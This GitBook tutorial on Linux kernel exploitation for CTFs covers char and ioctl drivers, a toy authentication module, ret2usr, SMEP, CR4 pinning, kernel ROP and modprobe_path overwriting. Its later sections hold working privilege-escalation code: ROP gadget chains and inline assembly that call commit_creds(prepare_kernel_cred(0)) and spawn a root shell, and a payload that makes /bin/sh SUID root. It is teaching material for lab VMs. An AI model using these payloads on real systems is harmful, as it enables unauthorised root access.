arrow-left

All pages
gitbookPowered by GitBook
1 of 23

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Writing a Char Module

hashtag
The Code

Writing a Char Module is suprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.

It looks simple, because it is simple. For now, anyway.

First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note we put parameters as void, this is because kernel modules are very picky about (even if just void).

We then register the purposes of the functions using module_init() and module_exit().

Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of message sent, and .

hashtag
Compiling

Compiling a Kernel Object can seem a little more complex as we use a , but it's surprisingly simple:

$(MAKE) is a special flag that effectively calls make, but it propagate all same flags that our Makefile was called with. So, for example, if we call

Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.

hashtag
Using the Kernel Module

Now we've got a ko file compiled, we can add it to the list of active modules:

If it's successful, there will be no response. But where did it print to?

Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.

Here we grab the last line using tail - as you can see, our printk is called!

Now let's unload the module:

And there our intro_exit is called.

circle-info

You can view currently loaded modules using the lsmod command

#include <linux/init.h>
#include <linux/module.h>

MODULE_LICENSE("Mine!");

static int intro_init(void) {
    printk(KERN_ALERT "Custom Module Started!\n");
    return 0;
}

static void intro_exit(void) {
    printk(KERN_ALERT "Custom Module Stopped :(\n");
}

module_init(intro_init);
module_exit(intro_exit);
requiring parametersarrow-up-right
there are many more typesarrow-up-right
Makefilearrow-up-right
obj-m += intro.o
 
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
$ make -j 8
$ sudo insmod test.ko
$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!
$ sudo rmmod test
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(

An Interactive Char Driver

Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.

hashtag
Exposing it to the File System

This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:

A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.

We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.

Note that on an error it calls class_destroy and unregister_chrdev:

hashtag
Cleaning it Up

These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:

hashtag
Controlling I/O

In intro_init, the first line may have been confusing:

The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:

The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:

We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!

hashtag
Full Code

Simply use sudo insmod to load it, .

hashtag
Testing The Module

Create a really basic exploit.c:

If the module is successfully loaded, the read() call should read QWERTY into buffer:

Success!

Interactivity with IOCTL

A more useful way to interact with the driver

Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:

  • File Descriptor fd

  • an unsigned int

  • an unsigned long

The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:

But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.

To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:

And you would have to update the file_operations struct:

On modern Linux kernel versions, . The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:

#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"

// setting up the device
int major;
static struct class*  my_class  = NULL;
static struct device* my_device = NULL;

static int __init intro_init(void) {
    major = register_chrdev(0, DEVICE_NAME, &fops);    // explained later

    if ( major < 0 )
        printk(KERN_ALERT "[Intro] Error assigning Major Number!");
    
    // Register device class
    my_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(my_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to register device class\n");
    }

    // Register the device driver
    my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
    if (IS_ERR(my_device)) {
        class_destroy(my_class);
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to create the device\n");
    }

    return 0;
}
as we did before
static ssize_t ioctl_handler(struct file *file, unsigned int cmd, unsigned long arg) {
    printk("Command: %d; Argument: %d", cmd, arg);

    return 0;
}
.ioctl has been removed and replaced by .unlocked_ioctl and .compat_ioctlarrow-up-right
static void __exit intro_exit(void) {
    device_destroy(my_class, MKDEV(major, 0));              // remove the device
    class_unregister(my_class);                             // unregister the device class
    class_destroy(my_class);                                // remove the device class
    unregister_chrdev(major, DEVICE_NAME);                  // unregister the major number
    printk(KERN_INFO "[Intro] Closing!\n");
}
major = register_chrdev(0, DEVICE_NAME, &fops);
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
    printk(KERN_ALERT "reading...");

    copy_to_user(buffer, "QWERTY", 6);

    return 0;
}

static struct file_operations fops = {
    .read = intro_read
};
ssize_t read(int fd, void *buf, size_t count);
#include <linux/init.h>
#include <linux/module.h>

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"

MODULE_AUTHOR("ir0nstone");
MODULE_DESCRIPTION("Interactive Drivers");
MODULE_LICENSE("GPL");

// setting up the device
int major;
static struct class*  my_class  = NULL;
static struct device* my_device = NULL;

static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
    printk(KERN_ALERT "reading...");

    copy_to_user(buffer, "QWERTY", 6);

    return 0;
}

static struct file_operations fops = {
    .read = intro_read
};

static int __init intro_init(void) {
    major = register_chrdev(0, DEVICE_NAME, &fops);

    if ( major < 0 )
        printk(KERN_ALERT "[Intro] Error assigning Major Number!");
    
    // Register device class
    my_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(my_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to register device class\n");
    }

    // Register the device driver
    my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
    if (IS_ERR(my_device)) {
        class_destroy(my_class);
        unregister_chrdev(major, DEVICE_NAME);
        printk(KERN_ALERT "[Intro] Failed to create the device\n");
    }

    return 0;
}

static void __exit intro_exit(void) {
    device_destroy(my_class, MKDEV(major, 0));              // remove the device
    class_unregister(my_class);                             // unregister the device class
    class_destroy(my_class);                                // remove the device class
    unregister_chrdev(major, DEVICE_NAME);                  // unregister the major number
    printk(KERN_INFO "[Intro] Closing!\n");
}

module_init(intro_init);
module_exit(intro_exit);
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

int main() {
    int fd = open("/dev/intro", O_RDWR);    // Open the device with RW access
    printf("FD: %d\n", fd);                 // print the file descriptor

    char buffer[6];
    memset(&buffer, 'A', 6);                // fill with As
    printf("%s\n", buffer);                 // print
    read(fd, buffer, 6);                    // read from module
    printf("%s\n", buffer);                 // print again
}
$ ./exploit

FD: 3
AAAAAA
QWERTY
#include <sys/ioctl.h>

// [...]

ioctl(fd, 0x100, 0x12345678);    // data is a string
static struct file_operations fops = {
    .ioctl = ioctl_handler
};
static struct file_operations fops = {
    .compat_ioctl = ioctl_handler,
    .unlocked_ioctl = ioctl_handler
};

Kernel ROP - Stack Pivoting

While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.

I don't think an example is necessary for this.

SMEP

Supervisor Memory Execute Protection

If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel spacearrow-up-right, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).

In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 registerarrow-up-right, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.

We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):

    -cpu qemu64,+smep

Sometimes it will be enabled by default, in which case you need to us nosmep.

Kernel ROP - Privilege Escalation in Kernel Space

Bypassing SMEP by ropping through the kernel

The previous approach failed, so let's try and escalate privileges using purely ROP.

hashtag
Modifying the Payload

hashtag
Calling prepare_kernel_cred()

First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):

Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds().

hashtag
Moving RAX to RDI for commit_creds()

This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!

I ended up combining these four gadgets:

  • Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret

  • Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX

hashtag
Returning to userland

Recall that we need swapgs and then iretq. Both can be found easily.

The pop rbp; ret is not important as iretq jumps away anyway.

To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.

If we try this now, we successfully escalate privileges!

hashtag
Final Exploit

Kernel ROP - Disabling SMEP

An old technique

hashtag
Setup

Using the same setuo as ret2usr, we make one single modification in run.sh:

Now if we load the VM and run our exploit from last time, we get a kernel panic.

chevron-rightKernel Panichashtag

It's worth noting what it looks like for the future - especially these 3 lines:

hashtag
Overwriting CR4

So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: . This function quite literally overwrites CR4.

Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):

Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:

CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.

The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run , from the official Linux git repository.

hashtag
Putting it all together

All that changes in the exploit is the overflow:

We can then compile it and run.

hashtag
Failure

This fails. Why?

If we look at the resulting kernel panic, we meet an old friend:

SMEP is enabled again. How? If we , we definitely hit both the gadget and the call to native_write_cr4(). What gives?

Well, if we look at , there's another feature:

Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is , and stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since .

Overwriting modprobe_path

A simple way to pop a shell

The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_modulearrow-up-right, which will spawn the modprobe tool using call_modprobearrow-up-right. modprobe is a userspace program that runs with root privileges, finds the required kernel module binary on filesystem and loads it.

The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.

If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:

To identify what program should be run to handle the signature, the kernel uses (code is slightly different in newer versions). This is run by request_module, but the signature .

The approach, therefore is simple. First compile a /tmp/hijack with source:

There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:

Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!

hashtag
Example

TODO

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
    -monitor /dev/null \
    -nographic \
    -no-reboot \
    -smp cores=2 \
    -cpu qemu64,+smep \        # add this line
    -s
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne and hit the ret
[    1.628455] Yes? �U"��
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
[    1.635878] #PF: error_code(0x0011) - permissions violation
[    1.637930] PGD 1296067 P4D 1296067 PUD 1295067 PMD 1291067 PTE 7c52025
[    1.639639] Oops: 0011 [#1] SMP
[    1.640632] CPU: 0 PID: 30 Comm: exploit Tainted: G           O       6.1.0 #6
[    1.646144] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.647030] RIP: 0010:0x4016b9
[    1.648108] Code: Unable to access opcode bytes at 0x40168f.
[    1.648952] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.649603] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.650321] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.651031] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.651743] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.652455] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.653218] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.654086] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.655452] Call Trace:
[    1.656167]  <TASK>
[    1.656846]  ? do_syscall_64+0x3d/0x90
[    1.658073]  ? entry_SYSCALL_64_after_hwframe+0x46/0xb0
[    1.660144]  </TASK>
[    1.660835] Modules linked in: kernel_rop(O)
[    1.662360] CR2: 00000000004016b9
[    1.663362] ---[ end trace 0000000000000000 ]---
[    1.664702] RIP: 0010:0x4016b9
[    1.665386] Code: Unable to access opcode bytes at 0x40168f.
[    1.666167] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.668501] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.669777] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.670710] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.672122] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.672795] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.673471] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.673854] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.674124] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.674576] Kernel panic - not syncing: Fatal exception
[    1.689999] Kernel Offset: 0x36200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[    1.695855] ---[ end Kernel panic - not syncing: Fatal exception ]---
native_write_cr4(val)arrow-up-right
extract-vmlinuxarrow-up-right
debug the exploit
the sourcearrow-up-right
set on bootarrow-up-right
version 5.3-rc1arrow-up-right
binfmtarrow-up-right
must contain at least one non-printable characterarrow-up-right
uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq_pop1 =  0xffffffff81022e1f;

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

int main() {
    // [...]

    // overflow
    uint64_t payload[7];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;
    
    // [...]
}
0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

// [...]

// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;
// commit_creds()
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;

payload[i++] = (uint64_t) escalate;
// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;              // iretq; pop rbp; ret

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[25];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;

    // commit_creds()
    payload[i++] = pop_rdx;
    payload[i++] = 0;
    payload[i++] = mov_rcx_rax;
    payload[i++] = mov_rdx_rcx;
    payload[i++] = mov_rdi_rax;
    payload[i++] = commit_creds;
        

    // commit_creds()
    payload[i++] = swapgs;
    payload[i++] = iretq;
    payload[i++] = user_rip;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_rsp;
    payload[i++] = user_ss;

    payload[i++] = (uint64_t) escalate;

    write(fd, payload, 0);
}
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux 
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped
$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;
// overflow
uint64_t payload[20];

int i = 6;

payload[i++] = 0xffffffff811e08ec;      // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0;      // native_write_cr4
payload[i++] = (uint64_t) escalate;

write(fd, payload, 0);
[    1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[    1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[    1.547037] #PF: supervisor instruction fetch in kernel mode
void __no_profile native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}
echo -e '\xff\xff\xff\xff' > /tmp/fake
chmod +x /tmp/fake
/tmp/fake
int main()
{
    system("cp /usr/bin/sh /tmp/sh");
    system("chown root:root /tmp/sh");
    system("chmod 4755 /tmp/sh");
}
echo -n -e '\xff\xff\xff\xff' > /tmp/fake
chmod +x /tmp/fake

Introduction

The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.

In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.

You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow herearrow-up-right, and I recommend it highly.

hashtag
Kernel Modules

Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r, my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often loaded into /dev/* or /proc/. There are 3 main module types: Char, Block and Network.

hashtag
Char Modules

Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.

Examples of Char modules include /dev/random.

circle-info

I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!

A Basic Kernel Interaction Challenge

hashtag
The Module

We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:

If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.

In order to update authenticated, we have to write() to the kernel module. What we attempt to write it compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!

hashtag
Interacting

Let's first try and interact with the kernel by reading from it.

circle-info

Make sure you sudo chmod 666 /dev/authentication!

We'll start by opening the device and reading from it.

circle-info

Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.

After compiling, we get that we are not authenticated:

Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!

It works!

Amazing! Now for something really important:

The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).

hashtag
Final Code

hashtag
Challenge - IOCTL

So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.

#define PASSWORD    "p4ssw0rd"
#define FLAG        "flag{YES!}"
#define FAIL        "FAIL: Not Authenticated!"

static int authenticated = 0;

static ssize_t auth_read(struct file *filp, char __user *buf, size_t len, loff_t *off) {
    printk(KERN_ALERT "[Auth] Attempting to read flag...");

    if (authenticated) {
        copy_to_user(buf, FLAG, sizeof(FLAG));      // ignoring `len` here
        return 1;
    }

    copy_to_user(buf, FAIL, sizeof(FAIL));
    return 0;
}

static ssize_t auth_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    char password_attempt[20];

    printk(KERN_ALERT "[Auth] Reading password from user...");

    copy_from_user(password_attempt, buf, count);

    if (!strcmp(password_attempt, PASSWORD)) {
        printk(KERN_ALERT "[Auth] Password correct!");
        authenticated = 1;
        return 1;
    }

    printk(KERN_ALERT "[Auth] Password incorrect!");

    return 0;
}
file-archive
2KB
basic_interaction.zip
archive
arrow-up-right-from-squareOpen
The Source Code
file-archive
2KB
basic_authentication_ioctl.zip
archive
arrow-up-right-from-squareOpen
Potential Solution
int fd = open("/dev/authentication", O_RDWR);

char buffer[20];
read(fd, buffer, 20);
printf("%s\n", buffer);
$ ./exploit 
FAIL: Not Authenticated!
write(fd, "p4ssw0rd\0", 9);

read(fd, buffer, 20);
printf("%s\n", buffer);
$ ./exploit
FAIL: Not Authenticated!
flag{YES!}
$ ./exploit 
flag{YES!}
flag{YES!}
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

int main() {
    int fd = open("/dev/authentication", O_RDWR);

    char buffer[20];
    read(fd, buffer, 1);
    printf("%s\n", buffer);

    write(fd, "p4ssw0rd", 8);

    read(fd, buffer, 20);
    printf("%s\n", buffer);
}

Debugging a Kernel Module

A practical example

hashtag
Trying on the Latest Kernel

Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:

circle-info

The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.

Instead of an elevated shell, we get a kernel panic, with the following data dump:

I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while , so it happens to all of us!

One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds():

We can , but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!

hashtag
Opening a GDBserver

In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.

What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.

We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:

This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:

This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!

hashtag
Finding the Issue

Let's compare the differences in prepare_kernel_cred() code between kernel and :

The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:

i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:

If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.

hashtag
Passing in init_cred

init_cred is defined . There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.

Kernel ROP - ret2usr

ROPpety boppety, but now in the kernel

hashtag
Introduction

By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.

The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.

hashtag
Vulnerable Module

circle-info

Note that the kernel version here is 6.1, due to some modifications we will discuss later.

The relevant code is here:

As we can see, it's a size 0x100 memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by make and the entire function just becomes xor eax, eax; ret!

hashtag
Exploitation

hashtag
Assembly to escalate privileges

Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled .

circle-exclamation

For obvious reasons, you require root permissions to read this file!

Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):

Then we call commit_creds() on the result (which is stored in RAX):

We can throw this directly into the C code using inline assembly:

hashtag
Overflow

The next step is overflowing. The 7th qword overwrites RIP:

Finally, we create a get_shell() function we call at the end, once we've escalated privileges:

hashtag
Returning to userland

If we run what we have so far, we fail and the kernel panics. Why is this?

The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which ).

